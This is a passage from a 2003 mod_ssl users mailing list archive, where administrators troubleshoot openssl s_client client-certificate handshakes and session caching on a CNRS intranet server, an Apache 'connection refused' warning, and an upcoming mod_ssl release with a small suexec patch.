   i:/C=FR/O=CNRS/CN=CNRS-Standard
 1 s:/C=FR/O=CNRS/CN=CNRS-Standard
   i:/C=FR/O=CNRS/CN=CNRS
 2 s:/C=FR/O=CNRS/CN=CNRS
   i:/C=FR/O=CNRS/CN=CNRS
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIEfzCCA2egAwIBAgICAvUwDQYJKoZIhvcNAQEEBQAwNDELMAkGA1UEBhMCRlIx
DTALBgNVBAoTBENOUlMxFjAUBgNVBAMTDUNOUlMtU3RhbmRhcmQwHhcNMDIwNjI0
MDcwODIyWhcNMDQwNjI0MDcwODIyWjB5MQswCQYDVQQGEwJGUjENMAsGA1UEChME
-- zip --
p1vfh+sI/gmyoV5Fpx3cQ1ZhS6PsFxHmhe6bnQSbyOJjVmtvR7qx7iAZuo3+NE8o
bNsDnc7NQrDxOts5mYQugiPpNwW+CS7Yj8uuXFPkF/G4pBPBRooiwoJ6o5X6CZi5
uYKp
-----END CERTIFICATE-----
subject=/C=FR/O=CNRS/OU=UPS836/CN=intranet.stic.cnrs.fr/Email=Xavier.Jeannin@urec.cnrs.fr
issuer=/C=FR/O=CNRS/CN=CNRS-Standard
---
Acceptable client certificate CA names
/C=FR/O=CNRS/CN=SSI
/C=FR/O=CNRS/CN=CNRS
/C=FR/O=CNRS/CN=Datagrid-fr
/C=FR/O=CNRS/CN=CNRS-Projets
/C=FR/O=CNRS/CN=CNRS-Standard
/Email=ca-administrateur@urec.cnrs.fr/CN=CNRS-Test/OU=UREC/O=CNRS/C=FR
/C=FR/O=CNRS/CN=CNRS-Plus
---
SSL handshake has read 3873 bytes and written 3551 bytes
---
New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA
Server public key is 1024 bit
SSL-Session:
    Protocol  : TLSv1
    Cipher    : EDH-RSA-DES-CBC3-SHA
    Session-ID:
    Session-ID-ctx:
    Master-Key: 
279FCDC4C400A75AE70E85755781EAA6F39429D8FC22AE69B6F95D982020F5DFAD6DF5B552DF21FE7DB23CC7FC09EE1A
    Key-Arg   : None
    Start Time: 1067509174
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
drop connection and then reconnect
CONNECTED(00000003)
---
New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA
SSL-Session:
    Protocol  : TLSv1
    Cipher    : EDH-RSA-DES-CBC3-SHA
    Session-ID:
    Session-ID-ctx:
    Master-Key: 
0F8D50DBEAE85A067D6A631609D5728CE9AA91F7052E39115481D6787478124CC43B290C4D164F858FBC2F44103F8C2A
    Key-Arg   : None
    Start Time: 1067509174
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
drop connection and then reconnect
CONNECTED(00000003)
---
New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA
SSL-Session:
    Protocol  : TLSv1
    Cipher    : EDH-RSA-DES-CBC3-SHA
    Session-ID:
    Session-ID-ctx:
    Master-Key: 
C04F385EFFBC7FE29AB3503C3A55F264D5EB42D33F5AD15D988E7E030E3E2D0A61BBF9540CD2CDFEF139A23F23656E42
    Key-Arg   : None
    Start Time: 1067509174
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
drop connection and then reconnect
CONNECTED(00000003)
---
New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA
SSL-Session:
    Protocol  : TLSv1
    Cipher    : EDH-RSA-DES-CBC3-SHA
    Session-ID:
    Session-ID-ctx:
    Master-Key: 
0FBF55C5A75525AC4DE0A508D984DAAFD046C38C251744F4546358747FFD7527BD88A6F5B5B2258DD8D99BD4F04D6227
    Key-Arg   : None
    Start Time: 1067509174
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
drop connection and then reconnect
CONNECTED(00000003)
---
New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA
SSL-Session:
    Protocol  : TLSv1
    Cipher    : EDH-RSA-DES-CBC3-SHA
    Session-ID:
    Session-ID-ctx:
    Master-Key: 
1FA07645E42886ED343D5C7B7BA722675B35E298AC48791D981784FFE2F640914D7BDBE0ADD184DEE104C4BDDC251494
    Key-Arg   : None
    Start Time: 1067509174
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
drop connection and then reconnect
CONNECTED(00000003)
---
New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA
SSL-Session:
    Protocol  : TLSv1
    Cipher    : EDH-RSA-DES-CBC3-SHA
    Session-ID:
    Session-ID-ctx:
    Master-Key: 
72B0D603F01C3416E2B39C650E7359B1123E959F49D54EB4654A9F26CF666089DDB071D305CF267FDB95E6B3210DD9B3
    Key-Arg   : None
    Start Time: 1067509174
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---

Bienvenue sur l'Intranet du département STIC du 
CNRS





My HTML page
closed



Mads Toftum a écrit:

>On Thu, Oct 30, 2003 at 09:24:04AM +0100, xavier jeannin wrote:
>  
>
>>24359:error:14094413:SSL routines:SSL3_READ_BYTES:sslv3 alert 
>>unsupported certificate:s3_pkt.c:1031:SSL alert number 43
>>24359:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake 
>>failure:s3_pkt.c:514:
>>
>>I am sorry but I do not understand the response. I am sure that my cert 
>>is valid, my private key too, and my cafile too.
>>Do you know where I can read documentation that explain the error 
>>message ? perhaps it is a bad used of openssl client.
>>    
>>
>
>openssl s_client expects the certificate and key to be in PEM format -
>
>openssl x509 -in cert.crt -inform DER -out cert.pem -outform PEM
>
>vh
>
>Mads Toftum
>  
>

-- 
_____________________________________________________________________________________________
Xavier Jeannin
UREC/CNRS Université P. & M. Curie, Courrier : case 171, 4 place Jussieu 75252 PARIS CEDEX 05
Tél : 01 44 27 42 59 - Fax : 01 44 27 42 61 - Courriel : jeannin@urec.cnrs.fr



--------------020103090009010106090102
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Ok Sorry I correct my mistake so now I  can connect  with SSL Client and
get my HTML Page.

 Thank you it is a powerful tools to debug (redirect, etc)

 

 I send to you the response I get, I am not capable to analyse the SSL sequence.

Is it a normal sequence ? 

Seeing this can we deduce the session cache work fine ? 

In this example, I have only ask for one page, I have not browsed into my
site so can we deduce anything from this example ?

Is  it possible to browse into a site with ssl_client (see cookie and session
pb) ?



thank you

--xj

 

CONNECTED(00000003)

---

Certificate chain

 0 s:/C=FR/O=CNRS/OU=UPS836/CN=intranet.stic.cnrs.fr/Email=Xavier.Jeannin@urec.cnrs.fr

   i:/C=FR/O=CNRS/CN=CNRS-Standard

 1 s:/C=FR/O=CNRS/CN=CNRS-Standard

   i:/C=FR/O=CNRS/CN=CNRS

 2 s:/C=FR/O=CNRS/CN=CNRS

   i:/C=FR/O=CNRS/CN=CNRS

---

Server certificate

-----BEGIN CERTIFICATE-----

MIIEfzCCA2egAwIBAgICAvUwDQYJKoZIhvcNAQEEBQAwNDELMAkGA1UEBhMCRlIx

DTALBgNVBAoTBENOUlMxFjAUBgNVBAMTDUNOUlMtU3RhbmRhcmQwHhcNMDIwNjI0

MDcwODIyWhcNMDQwNjI0MDcwODIyWjB5MQswCQYDVQQGEwJGUjENMAsGA1UEChME

-- zip --

p1vfh+sI/gmyoV5Fpx3cQ1ZhS6PsFxHmhe6bnQSbyOJjVmtvR7qx7iAZuo3+NE8o

bNsDnc7NQrDxOts5mYQugiPpNwW+CS7Yj8uuXFPkF/G4pBPBRooiwoJ6o5X6CZi5

uYKp

-----END CERTIFICATE-----

subject=/C=FR/O=CNRS/OU=UPS836/CN=intranet.stic.cnrs.fr/Email=Xavier.Jeannin@urec.cnrs.fr

issuer=/C=FR/O=CNRS/CN=CNRS-Standard

---

Acceptable client certificate CA names

/C=FR/O=CNRS/CN=SSI

/C=FR/O=CNRS/CN=CNRS

/C=FR/O=CNRS/CN=Datagrid-fr

/C=FR/O=CNRS/CN=CNRS-Projets

/C=FR/O=CNRS/CN=CNRS-Standard

/Email=ca-administrateur@urec.cnrs.fr/CN=CNRS-Test/OU=UREC/O=CNRS/C=FR

/C=FR/O=CNRS/CN=CNRS-Plus

---

SSL handshake has read 3873 bytes and written 3551 bytes

---

New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA

Server public key is 1024 bit

SSL-Session:

    Protocol  : TLSv1

    Cipher    : EDH-RSA-DES-CBC3-SHA

    Session-ID: 

    Session-ID-ctx: 

    Master-Key: 279FCDC4C400A75AE70E85755781EAA6F39429D8FC22AE69B6F95D982020F5DFAD6DF5B552DF21FE7DB23CC7FC09EE1A

    Key-Arg   : None

    Start Time: 1067509174

    Timeout   : 300 (sec)

    Verify return code: 0 (ok)

---

drop connection and then reconnect

CONNECTED(00000003)

---

New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA

SSL-Session:

    Protocol  : TLSv1

    Cipher    : EDH-RSA-DES-CBC3-SHA

    Session-ID: 

    Session-ID-ctx: 

    Master-Key: 0F8D50DBEAE85A067D6A631609D5728CE9AA91F7052E39115481D6787478124CC43B290C4D164F858FBC2F44103F8C2A

    Key-Arg   : None

    Start Time: 1067509174

    Timeout   : 300 (sec)

    Verify return code: 0 (ok)

---

drop connection and then reconnect

CONNECTED(00000003)

---

New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA

SSL-Session:

    Protocol  : TLSv1

    Cipher    : EDH-RSA-DES-CBC3-SHA

    Session-ID: 

    Session-ID-ctx: 

    Master-Key: C04F385EFFBC7FE29AB3503C3A55F264D5EB42D33F5AD15D988E7E030E3E2D0A61BBF9540CD2CDFEF139A23F23656E42

    Key-Arg   : None

    Start Time: 1067509174

    Timeout   : 300 (sec)

    Verify return code: 0 (ok)

---

drop connection and then reconnect

CONNECTED(00000003)

---

New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA

SSL-Session:

    Protocol  : TLSv1

    Cipher    : EDH-RSA-DES-CBC3-SHA

    Session-ID: 

    Session-ID-ctx: 

    Master-Key: 0FBF55C5A75525AC4DE0A508D984DAAFD046C38C251744F4546358747FFD7527BD88A6F5B5B2258DD8D99BD4F04D6227

    Key-Arg   : None

    Start Time: 1067509174

    Timeout   : 300 (sec)

    Verify return code: 0 (ok)

---

drop connection and then reconnect

CONNECTED(00000003)

---

New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA

SSL-Session:

    Protocol  : TLSv1

    Cipher    : EDH-RSA-DES-CBC3-SHA

    Session-ID: 

    Session-ID-ctx: 

    Master-Key: 1FA07645E42886ED343D5C7B7BA722675B35E298AC48791D981784FFE2F640914D7BDBE0ADD184DEE104C4BDDC251494

    Key-Arg   : None

    Start Time: 1067509174

    Timeout   : 300 (sec)

    Verify return code: 0 (ok)

---

drop connection and then reconnect

CONNECTED(00000003)

---

New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA

SSL-Session:

    Protocol  : TLSv1

    Cipher    : EDH-RSA-DES-CBC3-SHA

    Session-ID: 

    Session-ID-ctx: 

    Master-Key: 72B0D603F01C3416E2B39C650E7359B1123E959F49D54EB4654A9F26CF666089DDB071D305CF267FDB95E6B3210DD9B3

    Key-Arg   : None

    Start Time: 1067509174

    Timeout   : 300 (sec)

    Verify return code: 0 (ok)

---

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD><TITLE>Bienvenue sur l'Intranet du département
STIC du CNRS</TITLE>

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">

<META content="MSHTML 6.00.2800.1170" name=GENERATOR>

<link rel="stylesheet" href="../style/main.css" type="text/css">

</HEAD>

<BODY bgColor=#ffffff leftMargin=0 topMargin=0 MARGINHEIGHT="0" MARGINWIDTH="0">

My HTML page

</BODY></HTML>closed







Mads Toftum a écrit:



  
On Thu, Oct 30, 2003 at 09:24:04AM +0100, xavier jeannin wrote:
  

  

    
24359:error:14094413:SSL routines:SSL3_READ_BYTES:sslv3 alert 
unsupported certificate:s3_pkt.c:1031:SSL alert number 43
24359:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake 
failure:s3_pkt.c:514:

I am sorry but I do not understand the response. I am sure that my cert 
is valid, my private key too, and my cafile too.
Do you know where I can read documentation that explain the error 
message ? perhaps it is a bad used of openssl client.
    

  

  

openssl s_client expects the certificate and key to be in PEM format -

openssl x509 -in cert.crt -inform DER -out cert.pem -outform PEM

vh

Mads Toftum
  






-- 
_____________________________________________________________________________________________
Xavier Jeannin
UREC/CNRS Université P. & M. Curie, Courrier : case 171, 4 place Jussieu 75252 PARIS CEDEX 05
Tél : 01 44 27 42 59 - Fax : 01 44 27 42 61 - Courriel : jeannin@urec.cnrs.fr







--------------020103090009010106090102--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 30 12:44:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2D704A89E6; Thu, 30 Oct 2003 12:44:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id EC2C1A8933
	for ; Thu, 30 Oct 2003 12:44:14 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 774D86E4028; Thu, 30 Oct 2003 12:44:10 +0100 (CET)
Date: Thu, 30 Oct 2003 12:44:10 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Netscape ask always certificat
Message-ID: <20031030114410.GD23664@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3F9FE791.3020909@urec.cnrs.fr> <20031029170741.GC27125@toftum.dk> <3FA0CAA4.8050103@urec.cnrs.fr> <20031030084447.GA23664@toftum.dk> <3FA0EAB4.5060207@urec.cnrs.fr>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3FA0EAB4.5060207@urec.cnrs.fr>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Oct 30, 2003 at 11:40:52AM +0100, xavier jeannin wrote:
[SNIP]

> ---
> drop connection and then reconnect
> CONNECTED(00000003)
> ---
> New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA
> SSL-Session:
>    Protocol  : TLSv1
>    Cipher    : EDH-RSA-DES-CBC3-SHA
>    Session-ID:
>    Session-ID-ctx:
>    Master-Key: 
> 0F8D50DBEAE85A067D6A631609D5728CE9AA91F7052E39115481D6787478124CC43B290C4D164F858FBC2F44103F8C2A
>    Key-Arg   : None
>    Start Time: 1067509174
>    Timeout   : 300 (sec)
>    Verify return code: 0 (ok)

Session caching seems to be off on the server side - when I use reconnect, I get

    Protocol  : TLSv1
    Cipher    : EDH-RSA-DES-CBC3-SHA
    Session-ID: 1C7284F45FE7153AD082C737E2EBFD2176A4B0B34BCA41AE79663F9C804142EB
    Session-ID-ctx: 
    Master-Key: 6D9E61B97ADE120B056E79A09B3489D23D7D2A74FE2D82E067CBEF50296B76B5E6034ECDB32B4B062788BA9D9832DD3B


vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 31 12:11:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 98BA5A8958; Fri, 31 Oct 2003 12:11:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from www.atpmail.com (atpmail.com [216.55.187.46])
	by master.modssl.org (Postfix) with ESMTP id 1B980A8939
	for ; Fri, 31 Oct 2003 12:11:30 +0100 (CET)
Received: from www.atpmail.com (atpmail.com [216.55.187.46])
	by www.atpmail.com (8.12.9/8.12.9) with ESMTP id h9VBBOZQ076691
	for ; Fri, 31 Oct 2003 03:11:24 -0800 (PST)
Received: (from alex@localhost)
	by www.atpmail.com (8.12.9/8.12.9/Submit) id h9VBBNpP076683;
	Fri, 31 Oct 2003 03:11:23 -0800 (PST)
Message-Id: <200310311111.h9VBBNpP076683@www.atpmail.com>
To: modssl-users@modssl.org
From: "Alex Hart" 
Subject: Re: Apache warning: Connection refused: connect to listener
Date: Fri, 31 Oct 2003 06:11:23 -0500
X-Mailer: "ATPmail, Version 5.25"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Hart" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I know everyone forgot about this already, but I still have this problem. I was hoping the new release of apache (2.0.48) would somehow fix this, but it didn't.

To rehash, apache works fine, but when I run with openssl, I consistently (thousands of times in day) get the warning: 

[warn] (61)Connection refused: connect to listener.

Everything seems to work fine.

I'm now running 2 copies of apache, one on port 80 and one on 443. When I run it like this, I get no warnings. It's only when I run both secure and insecure on the same server that I get warnings.  Does that make any sense? It seems like openssl with my insecure pages are causing the warning, but I seem to get these even when no activity is going on.

Here's my version info:
[root@www /usr/local/apache2/bin]# ./httpd -V
Server version: Apache/2.0.48
Server built:   Oct 30 2003 23:42:59
Server's Module Magic Number: 20020903:4
Architecture:   32-bit
Server compiled with....
 -D APACHE_MPM_DIR="server/mpm/prefork"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_FLOCK_SERIALIZE
 -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D HTTPD_ROOT="/usr/local/apache2"
 -D SUEXEC_BIN="/usr/local/apache2/bin/suexec"
 -D DEFAULT_PIDLOG="logs/httpd.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_LOCKFILE="logs/accept.lock"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="conf/mime.types"
 -D SERVER_CONFIG_FILE="conf/httpd.conf"

SSLSessionCache dbm:logs/ssl_scache
SSLMutex file:logs/ssl_mutex

Oh well, I'm probably switching off of FreeBSD soon anyway. So I guess the problems will dissappear then.

Alex Hart
President and Head Honcho
ATP Solutions, Inc.
http://www.althepal.com
ATPmail - Your Webmail Solution

The following message was sent by Mads Toftum  on Fri, 3 Oct 2003 10:49:13 +0200.

> On Thu, Oct 02, 2003 at 11:58:35PM -0400, Alex Hart wrote:
> > More Info:
> > 
> > SSLSessionCache         dbm:logs/ssl_scache
> 
> Ususally I'd suggest using an shm based cache for performance reasons,
> but that probably isn't the cause.
> 
> > SSLMutex  file:logs/ssl_mutex
> > 
> I seem to recall some sort of trouble with mutexes on bsd that has been
> fixed recently - although your error message doesn't seem directly 
> related, it might be worth looking into. Or possibly even going for the
> latest cvs version in APACHE_2_0_BRANCH (a new release should be right
> around the corner anyway).
> 
> > I will try out different values for these, but I reinstalled without 
> modssl, so I have to install modssl first. Seems like these are pretty 
> standard settings. I'm surprised no one else has run across this warning.
> > 
> I have heard one reporting similar problems on irc, but that's it.
> 
> vh
> 
> Mads Toftum
> -- 
> Speaking at ApacheCon 2003 - http://ApacheCon.com/
> T03, "Apache 2 mod_ssl tutorial" (3h)
> WE03, "Troubleshooting Apache configurations" 
> WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 31 13:03:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1EF3FA89A3; Fri, 31 Oct 2003 13:03:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 89E70A893A
	for ; Fri, 31 Oct 2003 13:03:23 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.10/8.12.10) with ESMTP id h9VC3IBj013641
	for ; Fri, 31 Oct 2003 13:03:18 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.10/8.12.10) with ESMTP id h9VC3H9g008948
	for ; Fri, 31 Oct 2003 13:03:18 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: apache 1.3.29?
Date: Fri, 31 Oct 2003 13:03:17 +0100
Message-ID: 
X-MS-Has-Attach: 
Importance: normal
X-MS-TNEF-Correlator: 
Thread-Topic: apache 1.3.29?
thread-index: AcOew4M1m9laNMhETo+uQ4G7ujX5KwA4zzTQ
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just to ask the question... Is a mod_ssl_2.8.16-1.3.29 forseen?

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored. 

>-----Original Message-----
>From: Zvi Har'El [mailto:rl@math.technion.ac.il]
>Sent: Donnerstag, 30. Oktober 2003 09:54
>To: modssl-users@modssl.org
>Cc: rse@engelschall.com
>Subject: Re: apache 1.3.29?
>
>
>Hi Ralf,
>
>If you don't mind, please include a fix which allows the HTTPS 
>env variable
>to be passed by suexec
>
>--- apache_1.3.28/src/support/suexec.c.~20030719062731~ Sat 
>Jul 19 09:27:31
>2003
>+++ apache_1.3.28/src/support/suexec.c  Tue Aug 26 16:49:20 2003
>@@ -134,7 +134,7 @@
>     /* variable name starts with */
>     "HTTP_",
> #ifdef MOD_SSL
>-    "HTTPS_",
>+    "HTTPS=",
>     "SSL_",
> #endif
>
>This is already included in apache 2
>
>Thanks,
>
>Zvi.
>
>
>On Thu, 30 Oct 2003 09:06:52 +0100, Ralf S. Engelschall wrote 
>about "Re: apache 1.3.29?":
>> 
>> In article <200310291447.h9TElr409832@devsys.jaguNET.com> you wrote:
>> > Andreas Gietl wrote:
>> >> 
>> >> On Wednesday 29 October 2003 15:39, Jim Jagielski wrote:
>> >> 
>> >> i guess there will be a new patch within the next days/hours?
>> > 
>> > I would guess, but that's not my area :)
>> 
>> Yes, there will be a mod_ssl 2.8.16 released today or tomorrow. I've
>> already upgraded mod_ssl to Apache 1.3.29, but I've still to include
>> some other fixes. But 2.8.15 works fine with Apache 1.3.29, 
>so no need
>> to hurry here...
>>                                        Ralf S. Engelschall
>>                                        rse@engelschall.com
>>                                        www.engelschall.com
>> 
>> 
>______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Dr. Zvi Har'El     mailto:rl@math.technion.ac.il     Department of
Mathematics
tel:+972-54-227607 icq:179294841     Technion - Israel Institute of
Technology
fax:+972-4-8293388 http://www.math.technion.ac.il/~rl/     Haifa 32000,
ISRAEL
"If you can't say somethin' nice, don't say nothin' at all." -- Thumper
(1942)
                            Thursday, 4 Heshvan 5764, 30 October 2003,
10:49AM
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 31 13:07:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A20B9A89A3; Fri, 31 Oct 2003 13:07:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from d101.x-mailer.de (d101.x-mailer.de [212.162.12.2])
	by master.modssl.org (Postfix) with ESMTP id 8D49DA893A
	for ; Fri, 31 Oct 2003 13:07:14 +0100 (CET)
Received: from [127.0.0.1] (helo=10.0.0.55)
	by d101.x-mailer.de with asmtp (Exim 4.24)
	id 1AFY3Y-0005MZ-KH; Fri, 31 Oct 2003 13:07:08 +0100
From: Andreas Gietl 
Organization: e-admin internet gmbh
To: modssl-users@modssl.org, "Boyle Owen" 
Subject: Re: apache 1.3.29?
Date: Fri, 31 Oct 2003 13:06:05 +0100
User-Agent: KMail/1.5.4
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200310311306.05237.a.gietl@e-admin.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Gietl 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Friday 31 October 2003 13:03, Boyle Owen wrote:

Mr Engelschall said yesterday on this list:

Yes, there will be a mod_ssl 2.8.16 released today or tomorrow. I've
already upgraded mod_ssl to Apache 1.3.29, but I've still to include
some other fixes. But 2.8.15 works fine with Apache 1.3.29, so no need
to hurry here...
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com


> Just to ask the question... Is a mod_ssl_2.8.16-1.3.29 forseen?
>
> Rgds,
> Owen Boyle
> Disclaimer: Any disclaimer attached to this message may be ignored.
>
> >-----Original Message-----
>
> From: Zvi Har'El [mailto:rl@math.technion.ac.il]
>
> >Sent: Donnerstag, 30. Oktober 2003 09:54
> >To: modssl-users@modssl.org
> >Cc: rse@engelschall.com
> >Subject: Re: apache 1.3.29?
> >
> >
> >Hi Ralf,
> >
> >If you don't mind, please include a fix which allows the HTTPS
> >env variable
> >to be passed by suexec
> >
> >--- apache_1.3.28/src/support/suexec.c.~20030719062731~ Sat
> >Jul 19 09:27:31
> >2003
> >+++ apache_1.3.28/src/support/suexec.c  Tue Aug 26 16:49:20 2003
> >@@ -134,7 +134,7 @@
> >     /* variable name starts with */
> >     "HTTP_",
> > #ifdef MOD_SSL
> >-    "HTTPS_",
> >+    "HTTPS=",
> >     "SSL_",
> > #endif
> >
> >This is already included in apache 2
> >
> >Thanks,
> >
> >Zvi.
> >
> >
> >On Thu, 30 Oct 2003 09:06:52 +0100, Ralf S. Engelschall wrote
> >
> >about "Re: apache 1.3.29?":
> >> In article <200310291447.h9TElr409832@devsys.jaguNET.com> you wrote:
> >> > Andreas Gietl wrote:
> >> >> On Wednesday 29 October 2003 15:39, Jim Jagielski wrote:
> >> >>
> >> >> i guess there will be a new patch within the next days/hours?
> >> >
> >> > I would guess, but that's not my area :)
> >>
> >> Yes, there will be a mod_ssl 2.8.16 released today or tomorrow. I've
> >> already upgraded mod_ssl to Apache 1.3.29, but I've still to include
> >> some other fixes. But 2.8.15 works fine with Apache 1.3.29,
> >
> >so no need
> >
> >> to hurry here...
> >>                                        Ralf S. Engelschall
> >>                                        rse@engelschall.com
> >>                                        www.engelschall.com
> >
> >______________________________________________________________________
> >
> >> Apache Interface to OpenSSL (mod_ssl)
>
> www.modssl.org
>
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org

-- 
e-admin internet gmbh
Andreas Gietl                                            tel +49 941 3810884
Ludwig-Thoma-Strasse 35                      fax +49 (0)1805/39160 - 29104
93051 Regensburg                                  mobil +49 171 6070008

PGP/GPG-Key unter http://www.e-admin.de/gpg.html




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 31 13:12:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8AA13A8958; Fri, 31 Oct 2003 13:12:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
